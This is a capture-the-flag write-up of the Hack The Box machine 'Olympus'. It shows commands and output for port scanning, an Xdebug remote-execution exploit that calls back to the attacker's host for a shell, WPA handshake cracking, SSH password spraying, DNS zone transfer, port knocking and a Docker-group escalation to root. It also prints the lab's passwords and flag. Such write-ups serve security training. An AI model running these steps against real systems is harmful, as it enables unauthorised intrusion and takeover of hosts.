Olympus is CTF-like box. Starting with exploting X-Debug plugin in Apache with just HTTP Headers which gives you a container shell. You pivot to other containers while exploring techniques like 802.11 Wi-Fi cracking, DNS Zone Transfer, Port Knocking which lands you to the actual host. Then you’ve to gain root with Docker privileges being given to the user.
Enumeration
Masscan + Nmap
1
2
3
4
5
6
7
$ masscan -p1-65535,U:1-65535 `IP` --rate=5000 -e tun0 | tee masscan.out
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 53/udp on 10.10.10.83
Discovered open port 53/tcp on 10.10.10.83
Discovered open port 80/tcp on 10.10.10.83
Discovered open port 2222/tcp on 10.10.10.83
Parse those ports to nmap:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
$ ports=$(cat masscan.out |awk '{ print $4 }' | sed 's/\/tcp//;s/\/udp//' | tr '\n' ',' | sed 's/,$//')
$ nmap -v -sVC --min-rate 1000 -p $ports `IP` -oN nmap-fullscan.out
PORT STATE SERVICE VERSION
53/tcp open domain (unknown banner: Bind)
| dns-nsid:
|_ bind.version: Bind
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
| bind
|_ Bind
80/tcp open http Apache httpd
|_http-favicon: Unknown favicon MD5: 399EAE2564C19BD20E855CDB3C0C9D1B
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache
|_http-title: Crete island - Olympus HTB
2222/tcp open ssh (protocol 2.0)
| fingerprint-strings:
| NULL:
|_ SSH-2.0-City of olympia
| ssh-hostkey:
| 2048 f2:ba:db:06:95:00:ec:05:81:b0:93:60:32:fd:9e:00 (RSA)
|_ 256 f8:5b:2e:32:95:03:12:a3:3b:40:c5:11:27:ca:71:52 (ED25519)
Here DNS works on both tcp and udp ports. I enumerated and got nothing.
HTTP Port 80
Directory fuzzing with ffuf and got nothing.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
$ ffuf -u http://10.10.10.83/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -fc 401,403,405 -e .php,.html,.txt,.zip,.bak -t 500
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://10.10.10.83/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
:: Extensions : .php .html .txt .zip .bak
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 500
:: Matcher : Response status: 200,204,301,302,307,401,403,405
:: Filter : Response status: 401,403,405
________________________________________________
index.php [Status: 200, Size: 314, Words: 16, Lines: 12]
[Status: 200, Size: 314, Words: 16, Lines: 12]
index.php shows a image. Checking the source code shows not the location for the image but a CSS file. That file contains the path for image as /zeus.jpg. I check exifdata, strings inside the image, tried extracting it with steghide no password, checked for any embedded files inside with binwalk. Got nothing.
Let’s check what the service is running on:
1
2
$ whatweb http://10.10.10.83
http://10.10.10.83 [200 OK] Apache, Country[RESERVED][ZZ], HTML5, HTTPServer[Apache], IP[10.10.10.83], Title[Crete island - Olympus HTB], UncommonHeaders[x-content-type-options,xdebug], X-Frame-Options[sameorigin], X-XSS-Protection[1; mode=block]
It shows the server is running on Apache. Not just that, it shows uncommon headers: x-content-type-options,xdebug.
I can confirm those with curl and it shows Xdebug version as 2.5.5.
1
2
3
4
5
6
7
8
9
$ curl -I http://10.10.10.83
HTTP/1.1 200 OK
Date: Thu, 05 Aug 2021 13:04:41 GMT
Server: Apache
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-XSS-Protection: 1; mode=block
Xdebug: 2.5.5
Content-Type: text/html; charset=UTF-8
Xdebug 2.5.5
XDebug plugin allows HTTP clients to debug the operation of the Traffic Server cache using the default X-Debug header. If I google xdebug exploitation or Xdebug 2.5.5 exploit:
1
2
3
4
5
6
7
8
9
10
11
12
13
root@TheCaretaker:~$ googler Xdebug 2.5.5 exploit
1. xdebug < 2.5.5 - OS Command Execution ... - Exploit-DB
https://www.exploit-db.com/exploits/44568
02-May-2018 —
2. xdebug Unauthenticated OS Command Execution - Rapid7
https://www.rapid7.com/db/modules/exploit/unix/http/xdebug_unauth_exec/
14-Jun-2018 —
3. nqxcode/xdebug-exploit: OS Command Execution - GitHub
https://github.com/nqxcode/xdebug-exploit
23-Aug-2018 —
It really shows some exploits existing for Xdebug 2.5.5. The one on exploit-db uses metasploit. Module exploits a vulnerability in the eval command present in Xdebug versions 2.5.5 and below. This allows the attacker to execute arbitrary php code as the context of the web user.
Let’s see just the github repos for an exploit:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
root@TheCaretaker:~/HTB/Olympus$ googler 'Xdebug 2.5.5 exploit site:github.com -htb'
1. nqxcode/xdebug-exploit: OS Command Execution - GitHub
https://github.com/nqxcode/xdebug-exploit
23-Aug-2018 —
2. metasploit-framework/xdebug_unauth_exec.md at master ...
https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/unix/http/xdebug_unauth_exec.md
Xdebug is an actively-maintained PHP debugging tool that supports remote ... This module exploits an unauthenticated vulnerability that allows for the ...
3. xdebug-exploit/attack-scenario.md at master · nqxcode ...
https://github.com/nqxcode/xdebug-exploit/blob/master/attack-scenario.md
OS Command Execution. Contribute to nqxcode/xdebug-exploit development by creating an account on GitHub.
4. metasploit-framework/xdebug_unauth_exec.rb at master ...
https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/http/xdebug_unauth_exec.rb
class MetasploitModule < Msf::Exploit::Remote ... Module exploits a vulnerability in the eval command present in Xdebug versions 2.5.5 and below.
5. gteissier/xdebug-shell: xdebug reverse shell - GitHub
https://github.com/gteissier/xdebug-shell
What is xdebug ? Xdebug is a php extension that allows to debug php pages, remotely by using DGBp protocol. Code repository is located at xdebug. Code execution ...
googler (? for help) o 1-5
The fifth link looked like a good exploit and it worked too.
1
2
3
4
5
6
7
8
9
./xdebug-shell.py --local-host=10.10.14.32 --url=http://10.10.10.83/index.php
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ ls -l
total 116
-rw-r--r-- 1 root root 137 Apr 7 2018 crete.css
-rw-r--r-- 1 root root 67646 Apr 5 2018 favicon.ico
-rw-r--r-- 1 root root 362 Apr 15 2018 index.php
-rw-r--r-- 1 root root 37144 Apr 6 2018 zeus.jpg
This isn’t a stable shell, so I spawned a reverse-shell, which is at least better than this one. Also I don’t find the user.txt flag and If I check IP for the box, it seems like I’m in a container.
1
2
3
4
5
6
7
8
www-data@f00ba96171c5:/var/www/html$ ifconfig
eth0 Link encap:Ethernet HWaddr 02:42:ac:14:00:02
inet addr:172.20.0.2 Bcast:172.20.255.255 Mask:255.255.0.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:102 errors:0 dropped:0 overruns:0 frame:0
TX packets:88 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:9161 (8.9 KiB) TX bytes:20674 (20.1 KiB)
There exists one user named zeus, his home directory contains some files in the airgeddon directory:
1
2
3
www-data@f00ba96171c5:/home/zeus/airgeddon/captured$ ls
captured.cap
papyrus.txt
airgeddon dump
This captured.cap is a tcpdump data while running airgeddon on the network. I can crack this capture file with aircrack-ng:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
$ aircrack-ng captured.cap -w /usr/share/wordlists/rockyou.txt
Reading packets, please wait...
Opening captured.cap
Read 6498 packets.
# BSSID ESSID Encryption
1 F4:EC:38:AB:A8:A9 Too_cl0se_to_th3_Sun WPA (1 handshake)
Choosing first network as target.
Reading packets, please wait...
Opening captured.cap
Read 6498 packets.
Aircrack-ng 1.6
[00:00:00] 59/10303723 keys tested (1386.58 k/s)
Time left: 2 hours, 3 minutes, 51 seconds 0.00%
KEY FOUND! [ flightoficarus ]
Master Key : FA C9 FB 75 B7 7E DC 86 CC C0 D5 38 88 75 B8 5A
88 3B 75 31 D9 C3 23 C8 68 3C DB FA 0F 67 3F 48
Transient Key : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
EAPOL HMAC : AC 1A 73 84 FB BF 75 9C 86 CF 5B 5A F4 8A 4C 38
I created a list of usernames and passwords and sprayed to ssh login using crackmapexec:
1
2
3
4
5
6
prometheus
hades
zeus
icarus
Too_cl0se_to_th3_Sun
flightoficarus
icarus:Too_cl0se_to_th3_Sun succeeds.
1
2
3
4
5
6
7
8
9
10
crackmapexec ssh 10.10.10.83 --port 2222 -u users -p users
SSH 10.10.10.83 2222 10.10.10.83 [*] SSH-2.0-City of olympia
SSH 10.10.10.83 2222 10.10.10.83 [-] hades:Too_cl0se_to_th3_Sun Authentication failed.
SSH 10.10.10.83 2222 10.10.10.83 [-] hades:flightoficarus Authentication failed.
SSH 10.10.10.83 2222 10.10.10.83 [-] icarus:zeus Authentication failed.
SSH 10.10.10.83 2222 10.10.10.83 [-] icarus:poseidon Authentication failed.
SSH 10.10.10.83 2222 10.10.10.83 [-] icarus:prometheus Authentication failed.
SSH 10.10.10.83 2222 10.10.10.83 [-] icarus:hades Authentication failed.
SSH 10.10.10.83 2222 10.10.10.83 [-] icarus:icarus Authentication failed.
SSH 10.10.10.83 2222 10.10.10.83 [+] icarus:Too_cl0se_to_th3_Sun
And I can SSH in as icarus:
1
2
3
4
$ ssh -p 2222 icarus@10.10.10.83
icarus@10.10.10.83's password:
Last login: Sun Apr 15 16:44:40 2018 from 10.10.14.4
icarus@620b296204a3:~$
DNS Zone-Transfer
But this one’s also a docker container and there’s only one file which has:
1
2
3
4
5
icarus@620b296204a3:~$ cat help_of_the_gods.txt
Athena goddess will guide you through the dark...
Way to Rhodes...
ctfolympus.htb
So, I added 10.10.10.83 ctfolympus.htb to my /etc/hosts file and enumerated DNS again. And since DNS is running on TCP, I can try for zone-transfer:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
$ dig axfr ctfolympus.htb @10.10.10.83
; <<>> DiG 9.16.15-Debian <<>> axfr ctfolympus.htb @10.10.10.83
;; global options: +cmd
ctfolympus.htb. 86400 IN SOA ns1.ctfolympus.htb. ns2.ctfolympus.htb. 2018042301 21600 3600 604800 86400
ctfolympus.htb. 86400 IN TXT "prometheus, open a temporal portal to Hades (3456 8234 62431) and St34l_th3_F1re!"
ctfolympus.htb. 86400 IN A 192.168.0.120
ctfolympus.htb. 86400 IN NS ns1.ctfolympus.htb.
ctfolympus.htb. 86400 IN NS ns2.ctfolympus.htb.
ctfolympus.htb. 86400 IN MX 10 mail.ctfolympus.htb.
crete.ctfolympus.htb. 86400 IN CNAME ctfolympus.htb.
hades.ctfolympus.htb. 86400 IN CNAME ctfolympus.htb.
mail.ctfolympus.htb. 86400 IN A 192.168.0.120
ns1.ctfolympus.htb. 86400 IN A 192.168.0.120
ns2.ctfolympus.htb. 86400 IN A 192.168.0.120
rhodes.ctfolympus.htb. 86400 IN CNAME ctfolympus.htb.
RhodesColossus.ctfolympus.htb. 86400 IN TXT "Here lies the great Colossus of Rhodes"
www.ctfolympus.htb. 86400 IN CNAME ctfolympus.htb.
ctfolympus.htb. 86400 IN SOA ns1.ctfolympus.htb. ns2.ctfolympus.htb. 2018042301 21600 3600 604800 86400
;; Query time: 84 msec
;; SERVER: 10.10.10.83#53(10.10.10.83)
;; WHEN: Fri Aug 06 11:49:19 IST 2021
Earlier I heard “Way to Rhodes” and dig shows us “Here lies the great colossus of Rhodes”. I tried accesing other hosts, crete.ctfolympus.htb, hades.ctfolympus.htb, rhodes.ctfolympus.htb and RhodesColossus.ctfolympus.htb. They didn’t anything on HTTP. But TXT record shows us "prometheus, open a temporal portal to Hades (3456 8234 62431) and St34l_th3_F1re!"
I tried making sense of the numbers “3456 8234 62431”. These may be port numbers as they’re less than 65535. I can check if those ports are open and they aren’t:
1
2
3
4
5
6
7
8
9
$ nmap -p 3456,8234,62431 ctfolympus.htb
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-06 12:35 IST
Nmap scan report for ctfolympus.htb (10.10.10.83)
Host is up (0.085s latency).
PORT STATE SERVICE
3456/tcp closed vat
8234/tcp closed unknown
62431/tcp closed unknown
“Open a temporal” using these ports maybe hinting towards port-knocking.
Port knocking
I’m using a tool for port knocking which is available here
1
2
3
4
5
6
7
8
9
10
11
12
$ knock ctfolympus.htb 3456 8234 62431; nmap ctfolympus.htb
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-06 12:55 IST
Nmap scan report for ctfolympus.htb (10.10.10.83)
Host is up (0.095s latency).
Not shown: 996 closed ports
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
80/tcp open http
2222/tcp open EtherNetIP-1
Nmap done: 1 IP address (1 host up) scanned in 1.97 seconds
And I’ve a new SSH port. I’ll try prometheus:St34l_th3_F1re! which I got from zone-transfer.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
$ knock ctfolympus.htb 3456 8234 62431; ssh prometheus@ctfolympus.htb
The authenticity of host 'ctfolympus.htb (10.10.10.83)' can't be established.
ECDSA key fingerprint is SHA256:8TR2+AWSBT/c5mrjpDotoEYu0mEy/jCzpuS79d+Z0oY.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'ctfolympus.htb,10.10.10.83' (ECDSA) to the list of known hosts.
prometheus@ctfolympus.htb's password:
Welcome to
) (
( /( ) )\ ) (
)\()) ( /( (()/( ))\ (
((_)\ )(_)) ((_))/((_))\
| |(_)((_)_ _| |(_)) ((_)
| ' \ / _` |/ _` |/ -_)(_-<
|_||_|\__,_|\__,_|\___|/__/
prometheus@olympus:~$ ls
msg_of_gods.txt user.txt
If I see the IP for the box, I can confirm this one’s the host:
1
2
3
4
5
$ ip addr
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 1000
link/ether 00:50:56:b9:61:d5 brd ff:ff:ff:ff:ff:ff
inet 10.10.10.83/24 brd 10.10.10.255 scope global enp0s3
valid_lft forever preferred_lft forever
Privesc via docker
If I check for groups prometheus is in. It lists docker.
1
2
prometheus@olympus:~$ id
uid=1000(prometheus) gid=1000(prometheus) groups=1000(prometheus),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),111(bluetooth),999(docker)
I can list the containers running:
1
2
3
4
5
prometheus@olympus:~$ docker container ls
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
f00ba96171c5 crete "docker-php-entrypoi…" 3 years ago Up 14 hours 0.0.0.0:80->80/tcp crete
ce2ecb56a96e rodhes "/etc/bind/entrypoin…" 3 years ago Up 14 hours 0.0.0.0:53->53/tcp, 0.0.0.0:53->53/udp rhodes
620b296204a3 olympia "/usr/sbin/sshd -D" 3 years ago Up 14 hours 0.0.0.0:2222->22/tcp olympia
I can just run any docker while mounting the root of host to /mnt of that docker instance and access the file-system:
1
2
3
4
prometheus@olympus:~$ docker run -v /:/mnt -i -t crete bash
root@98b9021fd1b8:/home/zeus/airgeddon# cat /mnt/root/root.txt
aba486990e2e849e25c23f6e41e5e303